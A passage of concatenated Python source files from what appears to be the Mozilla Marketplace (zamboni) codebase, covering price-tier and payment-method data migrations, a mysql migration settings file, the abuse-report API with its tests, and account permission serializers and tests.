             'VE': {'currency': 'USD',
                    'price': '9.99',
                    'region': 10}}
}
# This is because method gets added on to the model later.
class FrozenPriceCurrency(amo.models.ModelBase):
    """Snapshot of the price_currency table schema at migration time,
    frozen so this script keeps working as the live model evolves
    (a `method` column gets added to the real model later)."""
    carrier = models.IntegerField()
    currency = models.CharField(max_length=10)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    provider = models.IntegerField()
    region = models.IntegerField(default=1)
    tier = models.ForeignKey(Price)
    class Meta:
        db_table = 'price_currency'
def run():
    """Wipe the price_currency table and rebuild it from the `tiers`
    mapping above, skipping USD amounts with no Price row."""
    FrozenPriceCurrency.objects.no_cache().all().delete()
    for k in sorted(tiers.keys()):
        v = tiers[k]
        try:
            tier = Price.objects.filter(price=k).no_transforms()[0]
        except IndexError:
            print 'Tier does not exist: {0}'.format(k)
            continue
        for country, values in v.items():
            FrozenPriceCurrency.objects.create(
                tier=tier,
                carrier=None,
                provider=1,
                price=values['price'],
                region=values['region'],
                currency=values['currency']
            )
            print 'Creating: {0}, {1}'.format(k, country)
########NEW FILE########
__FILENAME__ = 609-rereviewtheme-fix
#!/usr/bin/env python
import logging
from addons.models import Addon
from editors.models import RereviewQueueTheme
log = logging.getLogger('z.task')
def run():
    """Delete RereviewQueueTheme objects whose themes did not cascade delete
    with add-on. Came about from setting on_delete to invalid value in
    model."""
    for entry in RereviewQueueTheme.objects.all():
        try:
            entry.theme.addon
        except Addon.DoesNotExist:
            log.info('[Theme %s] Deleting rereview_queue_theme,'
                     ' add-on does not exist.' % entry.theme.id)
            entry.delete()
########NEW FILE########
__FILENAME__ = 611-add-payment-method
from constants.payments import PAYMENT_METHOD_CARD, PAYMENT_METHOD_OPERATOR
from market.models import Price, PriceCurrency
from mkt.regions import SPAIN, PL, CO, VE
# Maps a USD tier amount to {region id: {'method': payment method}};
# run() applies the payment method to each matching PriceCurrency row.
tiers = {
    '0.10': {SPAIN.id: {'method': PAYMENT_METHOD_OPERATOR},
             PL.id: {'method': PAYMENT_METHOD_OPERATOR},
             VE.id: {'method': PAYMENT_METHOD_CARD}},
    '0.25': {SPAIN.id: {'method': PAYMENT_METHOD_OPERATOR},
             PL.id: {'method': PAYMENT_METHOD_OPERATOR},
             VE.id: {'method': PAYMENT_METHOD_CARD}},
    '0.50': {SPAIN.id: {'method': PAYMENT_METHOD_OPERATOR},
             PL.id: {'method': PAYMENT_METHOD_OPERATOR},
             VE.id: {'method': PAYMENT_METHOD_CARD}},
    '0.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
    '1.99': {CO.id: {'method': PAYMENT_METHOD_CARD},
             VE.id: {'method': PAYMENT_METHOD_CARD}},
    '2.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
    '3.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
    '4.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
    '6.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
    '9.99': {VE.id: {'method': PAYMENT_METHOD_CARD},
             CO.id: {'method': PAYMENT_METHOD_CARD}},
    '12.49': {VE.id: {'method': PAYMENT_METHOD_CARD},
              CO.id: {'method': PAYMENT_METHOD_CARD}},
    '14.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
              CO.id: {'method': PAYMENT_METHOD_CARD},
              VE.id: {'method': PAYMENT_METHOD_CARD}},
    '19.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
              CO.id: {'method': PAYMENT_METHOD_CARD},
              VE.id: {'method': PAYMENT_METHOD_CARD}},
    '24.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
              CO.id: {'method': PAYMENT_METHOD_CARD},
              VE.id: {'method': PAYMENT_METHOD_CARD}},
    '29.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
              CO.id: {'method': PAYMENT_METHOD_CARD},
              VE.id: {'method': PAYMENT_METHOD_CARD}},
    '39.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
    '49.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
}
def run():
    """Set the payment method (card/operator) on existing PriceCurrency
    rows per the `tiers` table above."""
    for k in sorted(tiers.keys()):
        v = tiers[k]
        try:
            tier = Price.objects.get(price=k)
        except Price.DoesNotExist:
            print 'Tier does not exist: {0}'.format(k)
            continue
        for region, values in v.items():
            try:
                currency = PriceCurrency.objects.get(tier=tier, region=region)
            except PriceCurrency.DoesNotExist:
                print 'Region does not exist: {0}'.format(region)
                continue
            currency.method = values['method']
            currency.save()
            print 'Updating: {0}, {1}, {2}'.format(k, region, values['method'])
########NEW FILE########
__FILENAME__ = 612-fixup-columbia
from constants.payments import PAYMENT_METHOD_CARD
from market.models import Price, PriceCurrency
from mkt.constants import regions
def run():
    """Fix up Colombia pricing: drop the sub-dollar tiers, add missing
    high tiers, and switch the remaining tiers to card payment."""
    # 1. Remove the sub-dollar tiers for Colombia.
    for tier in ['0.10', '0.25', '0.50']:
        try:
            pc = PriceCurrency.objects.get(tier__price=tier,
                                           region=regions.CO.id)
        except PriceCurrency.DoesNotExist:
            print 'Skipping deleting PriceCurrency of {0} for CO'.format(tier)
            continue
        pc.delete()
        print 'Deleted PriceCurrency of {0} for CO'.format(tier)
    # 2. Add the missing high tiers (COP amounts) if absent.
    for tier, amount in [('14.99', '31280.00'),
                         ('19.99', '41720.00'),
                         ('24.99', '52160.00')]:
        try:
            price = Price.objects.get(price=tier)
        except Price.DoesNotExist:
            print 'Skipping adding in {0} for CO'.format(tier)
            continue
        if not PriceCurrency.objects.filter(tier=price,
                                            region=regions.CO.id).exists():
            PriceCurrency.objects.create(region=regions.CO.id, currency='COP',
                                         price=amount, carrier=None,
                                         provider=1, tier=price)
            print 'Created {0} for CO'.format(tier)
    # 3. Higher tiers pay by card.
    for tier in ['6.99', '9.99', '12.49', '14.99', '19.99', '24.99', '29.99']:
        try:
            pc = PriceCurrency.objects.get(tier__price=tier,
                                           region=regions.CO.id)
        except PriceCurrency.DoesNotExist:
            print 'Skipping modifying PriceCurrency of {0} for CO'.format(tier)
            continue
        pc.method = PAYMENT_METHOD_CARD
        pc.save()
        print 'Updated {0} for CO to card'.format(tier)
########NEW FILE########
__FILENAME__ = 620-add-mobile-profile
import amo
from mkt.webapps.models import AppFeatures, Webapp
def run():
    """Update feature profiles for mobile-only apps requiring qHD."""
    mobile_only = (Webapp.objects
                   .filter(addondevicetype__device_type__in=[
                       amo.DEVICE_MOBILE.id, amo.DEVICE_GAIA.id])
                   .exclude(addondevicetype__device_type__in=[
                       amo.DEVICE_TABLET.id, amo.DEVICE_DESKTOP.id]))
    for app in mobile_only:
        for version in app.versions.all():
            features, _ = AppFeatures.objects.get_or_create(version=version)
            features.update(has_qhd=True)
            print('Marked mobile-only app "%s" (version %s) as '
                  'requiring a qHD device' % (app, version))
########NEW FILE########
__FILENAME__ = 625-override-outdated-jetpack-compat
def run():
    """Intentional no-op migration slot."""
    return None
########NEW FILE########
__FILENAME__ = 626-override-outdated-jetpack-compat
import amo
from addons.models import Addon, CompatOverride, CompatOverrideRange
def run():
    """Mark Firefox >= 21.* incompatible for SDK add-ons whose current
    version was not built with Jetpack 1.14, replacing the bad ranges
    created by the previous (625) attempt."""
    addons = (Addon.objects
              .filter(type=amo.ADDON_EXTENSION, appsupport__app=amo.FIREFOX.id,
                      _current_version__files__jetpack_version__isnull=False)
              .exclude(_current_version__files__jetpack_version='1.14'))
    # Fix invalid compat ranges from last migration
    (CompatOverrideRange.objects.filter(
        compat__addon__in=addons, type=1, app_id=amo.FIREFOX.id,
        min_app_version='0', max_app_version='21.*', min_version='0')
     .delete())
    count = 0
    for addon in addons:
        co, created = CompatOverride.objects.get_or_create(addon=addon,
                                                           guid=addon.guid,
                                                           name=addon.name)
        CompatOverrideRange.objects.create(
            compat=co, type=1, app_id=amo.FIREFOX.id,
            min_app_version='21.*', max_app_version='*',
            min_version='0', max_version=addon.current_version.version)
        count += 1
    print('Overrode compatibility for %d SDK add-ons.' % count)
########NEW FILE########
__FILENAME__ = 642-encrypt-secret
from datetime import datetime
import amo
from aesfield.field import AESField
class FrozenAPIAccess(amo.models.ModelBase):
    """Frozen snapshot of the api_access table so this migration keeps
    working regardless of later model changes."""
    secret = AESField(max_length=255, aes_key='api:access:secret')
    class Meta:
        db_table = 'api_access'
def run():
    """Re-save every api_access row, backfilling a missing `created`
    timestamp along the way."""
    for access in FrozenAPIAccess.objects.all():
        # Round-trip through str so the AESField presumably re-encrypts
        # the value on save — confirm against aesfield's descriptor.
        access.secret = str(access.secret)
        if not access.created:
            access.created = datetime.now()
        access.save()
########NEW FILE########
__FILENAME__ = 645-collection-backfill-slugs
from mkt.collections.models import Collection
def run():
    """Backfill slugs."""
    # Re-saving is assumed to (re)generate each collection's slug —
    # confirm against Collection.save().
    for collection in Collection.objects.all():
        collection.save()
########NEW FILE########
__FILENAME__ = 653-backfill-app-install-counts
import datetime
from stats.models import GlobalStat
from mkt.monolith.models import MonolithRecord
# GlobalStat metric name being backfilled.
METRIC = 'apps_count_installed'
def run():
    """Backfill apps_count_installed."""
    # Get the first metric and increment daily until today's date.
    today = datetime.datetime.today().replace(hour=0, minute=0, second=0,
                                              microsecond=0)
    try:
        # Midnight of the earliest monolith record.
        date = (MonolithRecord.objects.order_by('recorded')
                .values('recorded')[0]['recorded']).replace(
            hour=0, minute=0, second=0, microsecond=0)
    except IndexError:
        return  # No monolith data. Bail out.
    while date < today:
        next_date = date + datetime.timedelta(days=1)
        # Delete the old stats for this date.
        GlobalStat.objects.filter(name=METRIC, date=date.date()).delete()
        # Add it back with the count from the Monolith table.
        count = MonolithRecord.objects.filter(recorded__range=(date,
                                                               next_date),
                                              key='install').count()
        GlobalStat.objects.create(name=METRIC, date=date.date(), count=count)
        date = next_date
########NEW FILE########
__FILENAME__ = 654-award-theme-points
#!/usr/bin/env python
def run():
    """Intentional no-op migration slot."""
    return None
########NEW FILE########
__FILENAME__ = 659-award-theme-points
#!/usr/bin/env python
def run():
    """Intentional no-op migration slot."""
    return None
########NEW FILE########
__FILENAME__ = 661-award-theme-points
#!/usr/bin/env python
import datetime
from django.db.models import Q
import amo
from amo.utils import chunked
from devhub.models import ActivityLog
from mkt.reviewers.tasks import _batch_award_points
import mkt.constants.reviewers as rvw
def run():
    """
    Retroactively award theme reviewer points for all the theme
    reviewers done since the Great Theme Migration to amo up to
    when we started recording points.
    """
    start_date = datetime.date(2013, 8, 27)
    # Approve/reject theme reviews from before awarding began; matched
    # by substring against the serialized _details JSON.
    approve_marker = '"action": %s' % rvw.ACTION_APPROVE
    reject_marker = '"action": %s' % rvw.ACTION_REJECT
    review_logs = ActivityLog.objects.filter(
        Q(_details__contains=approve_marker) |
        Q(_details__contains=reject_marker),
        action=amo.LOG.THEME_REVIEW.id, created__lte=start_date)
    for batch in chunked(review_logs, 50):
        # Review and thou shall receive.
        _batch_award_points.delay(batch)
########NEW FILE########
__FILENAME__ = 662-modify-existing-region-exclusions
#!/usr/bin/env python
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError
import mkt
from mkt.developers.cron import exclude_new_region
from mkt.webapps.models import AddonExcludedRegion
from mkt.zadmin.models import FeaturedAppRegion
def run():
    """
    Migrate from New Mexico to Old Mexico. Then add AddonExcludedRegion
    objects for those apps that opted out of being added to new regions.
    """
    # There were two Mexicos (12 is the first; 18 was the second one).
    for aer in AddonExcludedRegion.objects.filter(region=18):
        try:
            aer.update(region=mkt.regions.MX.id)
            print 'OK: %s New Mexico -> Old Mexico' % aer.id
        except (IntegrityError, ObjectDoesNotExist):
            # Likely a duplicate exclusion for the old region, or the
            # add-on is gone; skip either way.
            print 'SKIP: %s New Mexico -> Old Mexico' % aer.id
    # And the featured apps, if there were any.
    for far in FeaturedAppRegion.objects.filter(region=18):
        try:
            far.update(region=mkt.regions.MX.id)
            print 'OK: %s New Mexico -> Old Mexico' % far.id
        except (IntegrityError, ObjectDoesNotExist):
            print 'SKIP: %s New Mexico -> Old Mexico' % far.id
    # New regions were added.
    exclude_new_region([
        mkt.regions.MX,
        mkt.regions.HU,
        mkt.regions.DE,
        mkt.regions.ME,
        mkt.regions.RS,
        mkt.regions.GR,
    ])
########NEW FILE########
__FILENAME__ = 675-remove-captions-from-webapp-previews
#!/usr/bin/env python
import amo
from addons.models import Preview
from translations.models import delete_translation
def run():
    """
    Remove captions from Webapp Previews.

    NOTE(review): intentionally disabled (body below kept for reference).
    """
    # This should be done in a separate script, it's taking too long to be
    # a migration, and it doesn't need to be done as soon as we have deployed,
    # it can be done later.
    pass
    # for prev in Preview.objects.filter(
    # addon__type=amo.ADDON_WEBAPP,
    # caption__isnull=False).no_transforms().no_cache().iterator():
    # delete_translation(prev, 'caption')
########NEW FILE########
__FILENAME__ = schematic_settings
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Set up zamboni.
import manage # noqa
from django.conf import settings
# Build the mysql command line that schematic uses to run SQL migrations,
# from the Django 'default' database configuration.
config = settings.DATABASES['default']
config['HOST'] = config.get('HOST', 'localhost')
config['PORT'] = config.get('PORT', '3306')
if not config['HOST'] or config['HOST'].endswith('.sock'):
    # An empty host or a socket path means a local connection; the mysql
    # client wants an explicit 'localhost' here.
    # (Was a no-op string statement """ Oh you meant 'localhost'! """ —
    # converted to a real comment.)
    config['HOST'] = 'localhost'
s = 'mysql --silent {NAME} -h{HOST} -u{USER}'
if config['PASSWORD']:
    # Pass the password via the environment so it never appears in `ps`
    # output or the formatted command line.
    os.environ['MYSQL_PWD'] = config['PASSWORD']
    del config['PASSWORD']
if config['PORT']:
    s += ' -P{PORT}'
else:
    del config['PORT']
db = s.format(**config)
table = 'schema_version'
handlers = {'.py': sys.executable + ' -B manage.py runscript migrations.%s'}
########NEW FILE########
__FILENAME__ = forms
from django import forms
from users.models import UserProfile
from mkt.api.forms import SluggableModelChoiceField
from mkt.site.forms import AbuseForm
from mkt.webapps.models import Webapp
class UserAbuseForm(AbuseForm):
    # Abuse report against a user account; the target is resolved by pk.
    user = forms.ModelChoiceField(queryset=UserProfile.objects.all())
class AppAbuseForm(AbuseForm):
    # Abuse report against an app; the target may be given by pk or by
    # its app_slug (SluggableModelChoiceField accepts either).
    app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
                                    sluggable_to_field_name='app_slug')
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from abuse.models import AbuseReport
from mkt.account.serializers import UserSerializer
from mkt.api.fields import SlugOrPrimaryKeyRelatedField, SplitField
from mkt.webapps.serializers import SimpleAppSerializer
from mkt.webapps.models import Webapp
class BaseAbuseSerializer(serializers.ModelSerializer):
    """Common fields for abuse-report serializers (user and app variants)."""
    # Exposed as 'text' in the API but stored on AbuseReport.message.
    text = serializers.CharField(source='message')
    ip_address = serializers.CharField(required=False)
    # Accepts a pk on input, renders a full UserSerializer on output.
    reporter = SplitField(serializers.PrimaryKeyRelatedField(required=False),
                          UserSerializer())
    def save(self, force_insert=False):
        """Save the report but strip ip_address from the serialized output."""
        serializers.ModelSerializer.save(self)
        # Don't echo the reporter's IP back in the API response.
        del self.data['ip_address']
        return self.object
class UserAbuseSerializer(BaseAbuseSerializer):
    """Abuse report where the target is a user (pk in, UserSerializer out)."""
    user = SplitField(serializers.PrimaryKeyRelatedField(), UserSerializer())
    class Meta:
        model = AbuseReport
        fields = ('text', 'ip_address', 'reporter', 'user')
class AppAbuseSerializer(BaseAbuseSerializer):
    """Abuse report where the target is an app.

    Input accepts a pk or app_slug; output renders a SimpleAppSerializer.
    Both sides map onto the AbuseReport.addon FK (source='addon').
    """
    app = SplitField(
        SlugOrPrimaryKeyRelatedField(source='addon', slug_field='app_slug',
                                     queryset=Webapp.objects.all()),
        SimpleAppSerializer(source='addon'))
    class Meta:
        model = AbuseReport
        fields = ('text', 'ip_address', 'reporter', 'app')
########NEW FILE########
__FILENAME__ = test_views
import json
import urllib
from django.core import mail
from django.core.urlresolvers import reverse
from nose.tools import eq_
from abuse.models import AbuseReport
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from users.models import UserProfile
class BaseTestAbuseResource(object):
    """
    Setup for AbuseResource tests that require inheritance from TestCase.
    """
    # Subclasses set this to 'user' or 'app' to pick the endpoint.
    resource_name = None
    def setUp(self):
        super(BaseTestAbuseResource, self).setUp()
        self.list_url = reverse('%s-abuse-list' % (self.resource_name,))
        # Fake client address; the view records REMOTE_ADDR on the report.
        self.headers = {
            'REMOTE_ADDR': '48.151.623.42'
        }
class AbuseResourceTests(object):
    """
    Setup for AbuseResource tests that do not require inheritance from
    TestCase.
    Separate from BaseTestAbuseResource to ensure that test_* methods of this
    abstract base class are not discovered by the runner.
    """
    # Subclasses provide the POST payload (must include the 'sprout' potato
    # captcha field plus the target field, 'user' or 'app').
    default_data = None
    def _call(self, anonymous=False, data=None):
        """POST the abuse report; returns (response, decoded body)."""
        post_data = self.default_data.copy()
        if data:
            post_data.update(data)
        client = self.anon if anonymous else self.client
        res = client.post(self.list_url, data=urllib.urlencode(post_data),
                          content_type='application/x-www-form-urlencoded',
                          **self.headers)
        try:
            res_data = json.loads(res.content)
        # Pending #855817, some errors will return an empty response body.
        except ValueError:
            res_data = res.content
        return res, res_data
    def _test_success(self, res, data):
        """
        Tests common when looking to ensure complete successful responses.
        """
        eq_(201, res.status_code)
        fields = self.default_data.copy()
        # 'sprout' is the captcha field and is never echoed back.
        del fields['sprout']
        if 'user' in fields:
            eq_(data.pop('user')['display_name'], self.user.display_name)
            del fields['user']
        if 'app' in fields:
            eq_(int(data.pop('app')['id']), self.app.pk)
            del fields['app']
        for name in fields.keys():
            eq_(fields[name], data[name])
        # The report must be persisted and mailed out.
        newest_report = AbuseReport.objects.order_by('-id')[0]
        eq_(newest_report.message, data['text'])
        eq_(len(mail.outbox), 1)
        assert self.default_data['text'] in mail.outbox[0].body
    def test_get(self):
        res = self.client.get(self.list_url)
        eq_(res.status_code, 405)
    def test_send(self):
        res, data = self._call()
        self._test_success(res, data)
        assert 'display_name' in data['reporter']
    def test_send_anonymous(self):
        res, data = self._call(anonymous=True)
        self._test_success(res, data)
        eq_(data['reporter'], None)
    def test_send_potato(self):
        # Filling 'tuber' or mis-filling 'sprout' must fail the captcha.
        tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},
                                           anonymous=True)
        potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},
                                             anonymous=True)
        eq_(tuber_res.status_code, 400)
        eq_(potato_res.status_code, 400)
class TestUserAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
    """Abuse reports filed against a user account."""
    resource_name = 'user'
    def setUp(self):
        super(TestUserAbuseResource, self).setUp()
        self.user = UserProfile.objects.get(pk=2519)
        self.default_data = {
            'text': '@cvan is very abusive.',
            'sprout': 'potato',
            'user': self.user.pk
        }
    def test_invalid_user(self):
        # A nonexistent pk must be rejected with a validation error.
        res, data = self._call(data={'user': '-1'})
        eq_(400, res.status_code)
        assert 'Invalid' in data['user'][0]
class TestAppAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
    """Abuse reports filed against an app (by pk or by slug)."""
    fixtures = RestOAuth.fixtures + fixture('webapp_337141')
    resource_name = 'app'
    def setUp(self):
        super(TestAppAbuseResource, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.default_data = {
            'text': "@cvan's app is very abusive.",
            'sprout': 'potato',
            'app': self.app.pk
        }
    def test_invalid_app(self):
        res, data = self._call(data={'app': -1})
        eq_(400, res.status_code)
        assert 'does not exist' in data['app'][0]
    def test_slug_app(self):
        # The endpoint also accepts the app_slug in place of the pk.
        res, data = self._call(data={'app': self.app.app_slug})
        eq_(201, res.status_code)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.abuse.views import AppAbuseViewSet, UserAbuseViewSet
# Router exposing the user- and app-abuse endpoints under /abuse/.
abuse = SimpleRouter()
abuse.register('user', UserAbuseViewSet, base_name='user-abuse')
abuse.register('app', AppAbuseViewSet, base_name='app-abuse')
api_patterns = patterns('',
    url('^abuse/', include(abuse.urls)),
)
########NEW FILE########
__FILENAME__ = views
from rest_framework import generics, viewsets
from rest_framework.permissions import AllowAny
from rest_framework.throttling import UserRateThrottle
from mkt.abuse.serializers import AppAbuseSerializer, UserAbuseSerializer
from mkt.api.authentication import (RestOAuthAuthentication,
RestAnonymousAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import check_potatocaptcha, CORSMixin
class AbuseThrottle(UserRateThrottle):
    # Rate-limit abuse reports to 30 per hour per user (scope 'user').
    THROTTLE_RATES = {
        'user': '30/hour',
    }
class BaseAbuseViewSet(CORSMixin, generics.CreateAPIView,
                       viewsets.GenericViewSet):
    """POST-only viewset that files an abuse report and emails it out.

    Anonymous submissions are allowed; a potato captcha guards against
    spam and the server stamps reporter and ip_address onto the payload.
    """
    cors_allowed_methods = ['post']
    throttle_classes = (AbuseThrottle,)
    throttle_scope = 'user'
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    permission_classes = (AllowAny,)
    def create(self, request, *args, **kwargs):
        # Reject the request outright if the captcha check fails.
        fail = check_potatocaptcha(request.DATA)
        if fail:
            return fail
        # Immutable? *this* *is* PYYYYTHONNNNNNNNNN!
        request.DATA._mutable = True
        # Server-authoritative fields: never trust client-sent values.
        if request.amo_user:
            request.DATA['reporter'] = request.amo_user.pk
        else:
            request.DATA['reporter'] = None
        request.DATA['ip_address'] = request.META.get('REMOTE_ADDR', '')
        return super(BaseAbuseViewSet, self).create(request, *args, **kwargs)
    def post_save(self, obj, created=False):
        # Email the report once it has been persisted.
        obj.send()
class AppAbuseViewSet(BaseAbuseViewSet):
    # Abuse reports targeting an app.
    serializer_class = AppAbuseSerializer
class UserAbuseViewSet(BaseAbuseViewSet):
    # Abuse reports targeting a user account.
    serializer_class = UserAbuseSerializer
########NEW FILE########
__FILENAME__ = serializers
from functools import partial
from rest_framework import fields, serializers
from access import acl
from users.models import UserProfile
from mkt.api.serializers import PotatoCaptchaSerializer
class AccountSerializer(serializers.ModelSerializer):
    """Serializer for the user's own account settings (display_name only)."""
    class Meta:
        model = UserProfile
        fields = ('display_name',)
    def validate_display_name(self, attrs, source):
        """Validate that display_name is not empty"""
        value = attrs.get(source)
        if value is None or not value.strip():
            raise serializers.ValidationError("This field is required")
        return attrs
    def transform_display_name(self, obj, value):
        """Return obj.name instead of display_name to handle users without
        a valid display_name."""
        return obj.name
class FeedbackSerializer(PotatoCaptchaSerializer):
    """Payload for the site feedback endpoint (captcha-protected)."""
    feedback = fields.CharField()
    platform = fields.CharField(required=False)
    chromeless = fields.CharField(required=False)
    from_url = fields.CharField(required=False)
    # Read-only; populated from the request in validate().
    user = fields.Field()
    def validate(self, attrs):
        attrs = super(FeedbackSerializer, self).validate(attrs)
        if not attrs.get('platform'):
            # Fall back to the ?dev= query parameter when no platform given.
            attrs['platform'] = self.request.GET.get('dev', '')
        attrs['user'] = self.request.amo_user
        return attrs
class LoginSerializer(serializers.Serializer):
    # Persona/BrowserID login payload: the assertion is mandatory.
    assertion = fields.CharField(required=True)
    audience = fields.CharField(required=False)
    is_mobile = fields.BooleanField(required=False, default=False)
class NewsletterSerializer(serializers.Serializer):
    # Newsletter signup payload: just a validated email address.
    email = fields.EmailField()
class PermissionsSerializer(serializers.Serializer):
    """Flattens ACL checks into a dict of named boolean capabilities."""
    permissions = fields.SerializerMethodField('get_permissions')
    def get_permissions(self, obj):
        request = self.context['request']
        # Bind the request once; each check is then allowed(group, action).
        allowed = partial(acl.action_allowed, request)
        permissions = {
            'admin': allowed('Admin', '%'),
            'developer': request.amo_user.is_developer,
            'localizer': allowed('Localizers', '%'),
            'lookup': allowed('AccountLookup', '%'),
            'curator': allowed('Collections', 'Curate'),
            'reviewer': acl.action_allowed(request, 'Apps', 'Review'),
            # webpay requires both transaction and product-icon rights.
            'webpay': (allowed('Transaction', 'NotifyFailure')
                       and allowed('ProductIcon', 'Create')),
            'stats': allowed('Stats', 'View'),
            'revenue_stats': allowed('RevenueStats', 'View'),
        }
        return permissions
class UserSerializer(AccountSerializer):
    """
    A wacky serializer type that unserializes PK numbers and
    serializes user fields.
    """
    # Links back to this user's account-settings endpoint.
    resource_uri = serializers.HyperlinkedRelatedField(
        view_name='account-settings', source='pk',
        read_only=True)
    class Meta:
        model = UserProfile
        fields = ('display_name', 'resource_uri')
########NEW FILE########
__FILENAME__ = test_utils_
from nose.tools import eq_
from test_utils import RequestFactory
import amo.tests
from mkt.constants import apps
from mkt.webapps.models import Installed, Webapp
from mkt.site.fixtures import fixture
from users.models import UserProfile
from ..utils import purchase_list
class TestUtils(amo.tests.TestCase):
    """Tests that purchase_list only lists user/developer installs."""
    # TODO: add some more tests for purchase_list.
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        self.user = UserProfile.objects.get(pk=2519)
        self.app = Webapp.objects.get(pk=337141)
        self.req = RequestFactory().get('/')

    def _test(self, install_type, exists):
        # Renamed the parameter from `type` to avoid shadowing the builtin.
        # Create an install of the given type and check whether the app
        # shows up in the purchase list.
        Installed.objects.create(user=self.user, addon=self.app,
                                 install_type=install_type)
        if exists:
            eq_(list(purchase_list(self.req, self.user, None)[0].object_list),
                [self.app])
        else:
            assert not purchase_list(self.req, self.user, None)[0].object_list

    def test_user(self):
        self._test(apps.INSTALL_TYPE_USER, True)

    def test_developer(self):
        self._test(apps.INSTALL_TYPE_DEVELOPER, True)

    def test_reviewer(self):
        # Reviewer installs must never appear in a user's purchases.
        self._test(apps.INSTALL_TYPE_REVIEWER, False)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import collections
import json
import uuid
from urlparse import urlparse
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.http import QueryDict
from django.utils.http import urlencode
from mock import patch, Mock
from nose.tools import eq_, ok_
from amo.tests import TestCase, app_factory
from amo.utils import urlparams
from mkt.account.views import MineMixin
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants.apps import INSTALL_TYPE_REVIEWER
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed
from users.models import UserProfile
class TestPotatoCaptcha(object):
    """Mixin assertion helper for endpoints guarded by the potato captcha."""
    def _test_bad_api_potato_data(self, response, data=None):
        # A failed captcha must yield a 400 with a non_field_errors message.
        if not data:
            data = json.loads(response.content)
        eq_(400, response.status_code)
        ok_('non_field_errors' in data)
        eq_(data['non_field_errors'], [u'Form could not be submitted.'])
class FakeResourceBase(object):
    # Empty base so tests can patch a get_object onto it (create=True).
    pass
class FakeResource(MineMixin, FakeResourceBase):
    # Minimal stand-in for a DRF view using MineMixin.
    def __init__(self, pk, request):
        self.kwargs = {'pk': pk}
        self.request = request
class TestMine(TestCase):
    """MineMixin should rewrite pk 'mine' to the authenticated user's pk."""
    fixtures = fixture('user_2519')
    def setUp(self):
        self.request = Mock()
        self.request.amo_user = UserProfile.objects.get(id=2519)
    @patch.object(FakeResourceBase, 'get_object', create=True)
    def test_get_object(self, mocked_get_object):
        # A numeric pk passes through unchanged...
        r = FakeResource(999, self.request)
        r.get_object()
        eq_(r.kwargs['pk'], 999)
        # ...but 'mine' resolves to the request user's pk.
        r = FakeResource('mine', self.request)
        r.get_object()
        eq_(r.kwargs['pk'], 2519)
class TestPermission(RestOAuth):
    """Tests for the account-permissions endpoint."""
    fixtures = fixture('user_2519', 'user_10482')
    def setUp(self):
        super(TestPermission, self).setUp()
        self.get_url = reverse('account-permissions', kwargs={'pk': 2519})
        self.user = UserProfile.objects.get(pk=2519)
    def test_has_cors(self):
        self.assertCORS(self.client.get(self.get_url), 'get')
    def test_verbs(self):
        # Fixed: ('get') is a parenthesised string, not a tuple — the
        # missing comma made this iterate over characters, not verbs.
        self._allowed_verbs(self.get_url, ('get',))
    def test_other(self):
        # You may only read your own permissions.
        self.get_url = reverse('account-permissions', kwargs={'pk': 10482})
        eq_(self.client.get(self.get_url).status_code, 403)
    def test_no_permissions(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200, res.content)
        # All known capability keys are present, and none granted yet.
        self.assertSetEqual(
            ['admin', 'developer', 'localizer', 'lookup', 'curator',
             'reviewer', 'webpay', 'stats', 'revenue_stats'],
            res.json['permissions'].keys()
        )
        ok_(not all(res.json['permissions'].values()))
    def test_some_permission(self):
        self.grant_permission(self.user, 'Localizers:%')
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(res.json['permissions']['localizer'])
    def test_mine(self):
        # 'mine' resolves to the authenticated user.
        self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})
        self.test_some_permission()
    def test_mine_anon(self):
        self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})
        res = self.anon.get(self.get_url)
        eq_(res.status_code, 403)
    def test_publisher(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(not res.json['permissions']['curator'])
    def test_publisher_ok(self):
        self.grant_permission(self.user, 'Collections:Curate')
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(res.json['permissions']['curator'])
    def test_webpay(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(not res.json['permissions']['webpay'])
    def test_webpay_ok(self):
        # webpay requires BOTH grants (see PermissionsSerializer).
        self.grant_permission(self.user, 'ProductIcon:Create')
        self.grant_permission(self.user, 'Transaction:NotifyFailure')
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(res.json['permissions']['webpay'])
    def test_stats(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
